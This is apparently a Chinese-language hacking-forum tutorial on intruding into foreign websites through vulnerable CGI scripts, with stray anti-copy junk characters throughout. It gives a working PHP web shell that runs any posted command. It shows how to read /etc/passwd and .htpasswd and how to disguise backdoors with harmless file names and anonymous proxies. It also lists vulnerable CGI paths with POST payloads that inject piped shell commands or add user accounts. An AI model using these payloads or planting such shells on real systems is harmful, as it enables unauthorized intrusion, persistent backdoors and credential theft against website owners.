CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
# v7 I4 B1 @/ x5 U% T+ P很开心来到贵论坛
这里让我感觉 很有技术交流的感觉
我会长长来玩的
% e2 B" e- t) M) i. h% _- d! ?前言:
以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
; K: Q- s; v, N! \我门都知道 国外伺服器大多是linux 平台
. |' n9 j) S5 m/ h1 r# ~所以有很多网站程序有6成都会使用cgi 脚本来管理
2 p, C% J2 T+ H3 U) N: l* _目录为/cgi-bin/
  e! y% @' N% R) N
只是个人在实务上一些经验
, f8 }3 ~+ g# B* M  S写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
9 f9 s. H" S+ V5 }1 g' a& @讲解一下
让没有基础的人很容易上手

; Q! B# u0 O! F1 U以下内容跟帖回复才能看到
% j+ ?! R" l+ ~( ]% Q5 K6 l1 x==============================

第1部份: 何谓Shell?
, L6 U% z6 U5 {Shell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
8 [3 W: Q# N/ s! B" [6 \A shell is the program which reads user input from the command line and executes actions based upon that input.
+ G5 K9 W! _0 ], \0 C1 d意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.

2 I7 X) n6 A) M+ i/ S0 `对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.
6 ]; ]& u8 ]; A& T. B/ I' O
第2部份: Unix 指令
以下是一些常见及重要的指令:
4 @2 {, q3 j0 [( i- Ypwd: 显示当前目录, 即是後门/程式所在的位置
+ J: O' ?" q+ u+ _4 h  v如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
7 K7 s, V5 Q+ |5 _* B8 Cls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
5 O  n, B8 [% \2 P7 c2 rls ../ -al: 详细列出上一层的资料夹及档案
/ R9 _3 o/ @8 X% P0 ~) w! L9 Zcat: 显示档案内容
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
) _: e) E# \& e6 ^% u' v' S1 ~, T# {cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
% M6 T0 x% ?& n4 e& ~; z! p& Cwho: 显示谁login 至系统
man: 显示指令用法  
, B6 v; q3 p; j; P2 uman ls: 显示ls这指令的用法  
mkdir 建立目录
rmdir 删除目录
mv 移动档案
+ j* J9 ~/ H. F! Wrm 删除档案

) t8 E( B# m9 M& |3 i( x; `第3部份: Shell的使用
例如:
( f+ R5 O/ R+ O; e3 r& ehttp://site.com/refer.php
' o% L6 _2 x( r1 B; i这是我的後门, 原代码如下:
<Form Action="#" Method="POST">
" A- I9 X' |0 _6 B9 Y" L8 V7 Z<Input type="text" name="cmd">
  A$ s! ^- T6 i/ Y<Input type="Submit">
</Form>
/ V: g4 Q  ~$ @( U% |7 E& m  Z<?php
4 V  q6 E( @. ~& X- b4 ]$cmd = $_POST['cmd'];
. s* S3 |$ U0 Z9 B" z$Output = shell_exec($cmd);
* s1 v* e1 c/ [/ U6 L( i; t7 |; Yecho $Output;
; s8 M9 P8 t% r( y?>
# I% F: X  T* |. r( t! L输入pwd, 可得到绝对路径:
, w2 t  t* x, I- j" C  `8 |/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
$ z8 `6 D' ]7 x" A
第4部份: 注意事项
- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
1 J8 `4 n% S* |& I- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
3 Z  D9 ]4 u" j, Z7 [. y9 N- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
; I+ I" G) ~# C' V% }: B针对网站的渗透分析方法太多了
# e) ]% d0 S. O$ i这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
) K: u% U. h6 l9 v) J开始讲解脚本入侵过程:
. o" Y5 G3 ~" k  v6 [  n, h在这里提供一些方法思路让大家学习一下

1.一开始对一个网站进行cgi漏洞扫描
我们需要的东西有
, j( ?0 w6 f5 t扫洞工具 如:triton..等等
E表
9 x4 g, A/ ~  j' p) `" V- k如
/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
5 Y$ R4 d9 R4 V9 ~/Admin_files/order.log
; R1 V* |2 k2 v$ s% S1 X/orders/mountain.cfg
1 n' g& Q6 R8 w# F- U7 R/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
E表来源可以是网路收寻或是自己的0 day
6 w  p6 s% l6 U$ n
( g  c4 y, j+ w; h( |( S% R6 \+ @) J* a6 V2.怎样确认扫到的洞 是真的还假的?
4 Y2 ]* J, h" I* Y. j举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
一般都是在IE里先看一下的,记住这个返回码哦
. f9 U1 d4 n8 R7 V1 N& s( w* \" vERROR:This script should be referenced with a METHOD of POST.
( k" y  F! q% u& S7 Q没有返回一定是假的
3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
可以是源代码分析 找出介质
3 e, y- V+ C9 b& f2 @) P" g或是用抓包工具 抓他的语法...等等

3 N9 [: o0 {6 {2 i8 B以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
/index.cgi
wei=ren&gen=command
/passmaster.cgi
) [) x2 y/ u: D5 V! T" ZAction=Add&Username=Username&Password=Password
7 L  u1 ^' L) W" t0 h5 z/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
/form.cgi
0 N9 q2 N- u; j0 [5 tname=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
/ccbill-local.asp
post_values=username:password
8 ^7 W8 o) S1 K, D3 k) C/count.cgi
pinfile=|echo;ls -la;exit|
/recon.cgi
* X! N) E% z8 K3 A; t- z. F* |/recon.cgi?search
8 Q  F+ V- J6 S; B9 H7 t7 d& Ssearchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
* @' P- X* f& Z& I0 W8 }vercode=username:password:dseegsow:add:amount<&30>
/af.cgi_browser_out=|echo;ls -la;exit;|
) e! z5 u1 X' v! l, J. S; G
今天就讲到这  感谢大家支持